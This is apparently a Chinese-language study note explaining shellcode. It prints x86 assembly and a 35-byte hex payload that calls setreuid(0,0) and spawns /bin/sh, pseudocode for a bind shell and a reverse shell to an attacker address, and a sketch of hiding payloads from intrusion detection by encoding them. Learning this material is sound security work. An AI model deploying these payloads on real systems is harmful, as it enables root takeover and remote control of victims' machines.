每次听到shellcode,都有点懵,做如下简单了解,虽然还是不是很清楚,深入学习会有很多东西,先记下这些吧。

1、什么是shellcode?

  Shellcode是指能完成特殊任务的自包含的二进制代码,根据不同的任务可能是发出一条系统调用或建立一个高权限的ShellShellcode也就由此得名。它的最终目的是取得目标机器的控制权,所以一般被攻击者利用系统的漏洞送入系统中执行,从而获取特殊权限的执行环境,或给自己设立有特权的帐户。

2、shellcode的基本原理?

  Shellcode是一段高技巧的软件代码,为了小而精,一般直接写为16进制的操作码,当然编写者一般采用C或汇编编写,然后通过汇编程序成为16进制的操作码。shellcode攻击主要经历如下步骤:

1)、获取特殊权限

   攻击的目标通常是某个SUID(具有高权限的系统程序)程序,因为它可以具有较高的特权去执行一些命令(比如修口令等),好的SUID程序会在不必要时放弃过高的特权,需要时再重新设置获取特权。Setreuid是用来设置(恢复)进程的真实和有效的用户ID。当然也就可以设置root(0)的权限。

xor ebx,ebx    参数一:真实用户id(ruid)=0

xor ecx,ecx    参数二:有效用户id(euid)=0

xor eax,eax

mov al,0x46    系统调用0x46

int 0x80       设置setreuid(0,0)

有了root(0)用户权限,系统基本就归你指挥了。 

2)、执行/bin/sh

  有了特权,还要有个“工作室”,shellLinux常用的控制台,取得一个有特权的shell,就可以让你“随意”工作了。建立一个shell并不复杂,一般采用execve调用执行/bin/sh软件

char *shell[2]

 shell[0]=”/bin/sh”;

 shell[1]=0;

execve(shell[0],shell,NULL);

该调用C语言编写很简单,对应的汇编代码也不复杂:

xor eax,eax        eax=0

push eax           eax=null

push 0x68732f2f    压栈 //sh

push 0x6e69622f    压栈 /bin

mov ebx,esp        ebx=esp指向/bin/sh

push eax           eax=null 结束栈null

push ebx           参数2   ebx指向/bin/sh

mov ecx,esp        参数3   ecx指向[“/bin/sh”,NULL]

xor edx,edx         参数4  edx=NULL

mov al,0xb          参数1  eax=0xb

int 0x80

 

综合以上两个部分,就是最常见的Shellcode了,具体生成的16进制代码如下(35个字节)

\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80           ;setreuid(0,0)

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1

\x31\xd2\xb0\x0b\xcd\x80                         ;执行/bin/sh

该代码可以放置在缓冲区内,通过指针函数调用执行。在缓冲区溢出等方式获得执行权利时,运行该段代码就可以打开一个具有root(0)权限的shell界面。

  Shellcode在不同的场合,可能有严格的限制,比如在命令行溢出漏洞时,不能太大,没有有效的空间来存放代码,所以要严格精简代码的长度。在SQL注入时对长度的要求更加苛刻,所以很多业界流行的、优秀的Shellcode是经过各种技巧精练的结果。Shellcode是攻击注入代码的统称,并非一定是打开Shell,根据漏洞程序本身的特性有很多的改变,有兴趣的朋友可以从网上收集。

 3)、绑定到端口的Shellcode

shellcode在目标计算机上打开一个端口(通讯服务),并将Shell绑定到该端口,攻击者可以放弃入侵时用的端口,等于在目标机器上建立了系统的后门。该端口可以为入侵者随时建立连接,因为是打开了shell,所以等于建立远程控制目标的控制台。

开启服务离不开SocketSocket定义为一个端口和一个IP到一个进程的绑定。

a)建立本地IP SocketTCP

 int server

 server=socket(2,1,0)

b)IP和端口建立一个Sockaddr_in结构

 struct sockaddr_in server_addr

   server_addr.sin_addr.s_addr=0        socket的地址设为本地地址

   server_addr.sin_port=0xBBBB        socket的端口设为0xBBBB=48059

   server_addr.sin_family=2             协议族为IP

c)将端口和IP绑定到Socket

 bind(server, (struct sockaddr *)&server_addr, 0x10)

d)以监听模式启动socket:打开端口并等待连接

 listen(server, 0)

e)有连接时,向客户返回一个句柄

 int client

client=accept(server, 0, 0)

f)将返回的句柄,复制到stdinstdoutstderrshell输出到攻击者(client)的屏幕

 dup2(client,0)

 dup2(client,1)

 dup2(client,2)

g)调用普通的execve执行shellcode

 char *shell[2]

shell[0]=”/bin/sh”

   shell[1]=0

execve(shell[0], shell, 0)

4)、反向连接的shellcode

当目标计算机在防火墙后时,防火墙不允许外边的计算机主动访问目标机器。所以即使采用上边的shellcode建立了服务后门,你还是不能与目标计算机建立连接。反向连接的含义就是,让目标计算机通过特定的IP(攻击者的)和端口反向连接到攻击者,也可以设定为在固定的时间段主动来建立连接。

很多木马就利用这种方式,主动连接带木马的管理者,“神不知,鬼不觉”地把目标计算机加入到某个“僵尸网络”的黑社会团伙中。

a)建立本地IP SocketTCP

 int soc

 soc=socket(2,1,0)

b)IP和端口建立一个Sockaddr_in结构

 struct sockaddr_in server_addr

   server_addr.sin_addr.s_addr=0x660A0A0A  socket的地址设为10.10.10.102

   server_addr.sin_port=0xBBBB            socket的端口设为0xBBBB=48059

   server_addr.sin_family=2                协议族为IP

c)建立反向连接connect

 int remote

remote=connect(soc, (struct sockaddr*)&server_addr, 0x10)

d)socket复制到stdinstdoutstderrshell输出到攻击者的屏幕

 dup2(soc,0)

 dup2(soc,1)

 dup2(soc,2)

e)调用普通的execve执行shellcode

 char *shell[2]

shell[0]=”/bin/sh”

   shell[1]=0

execve(shell[0], shell, 0)

注意:10.10.10.102为防火墙外攻击机器的地址,此时在该机器上要启动一个监听48059端口的服务

5)、躲避IDS的过滤

由于经典的Shellcode并不是有很多的版本,大多数人员都是采用同样的Shellcode,很少有人自己编写。所以IDS厂商把常见的Shellcode的指纹提取出来,作为验证攻击行为的“特征”,很多攻击行为就暴露在IDS的监控之下,网络管理人员可以很快知道你到了他的网络内部,进而采取“捕获”措施。

  所以,隐藏指纹,变换代码,Shellcode也在不断更新。技术很多,这里就不例举了,提一个有意思的思路:因为Shellcode的基本功能相同,都是诱使目标机器执行这些指令,目标代码在传输和存放时是很容易被IDS或系统察觉的,那么直到被执行前才恢复原来面貌是一个好注意。所以有人通过把代码简单移位,“加密”后的代码没有任何“意义”,到执行前再反向移位,被检测到的概率就小多了,这种方式对躲避IDS是很有效果的。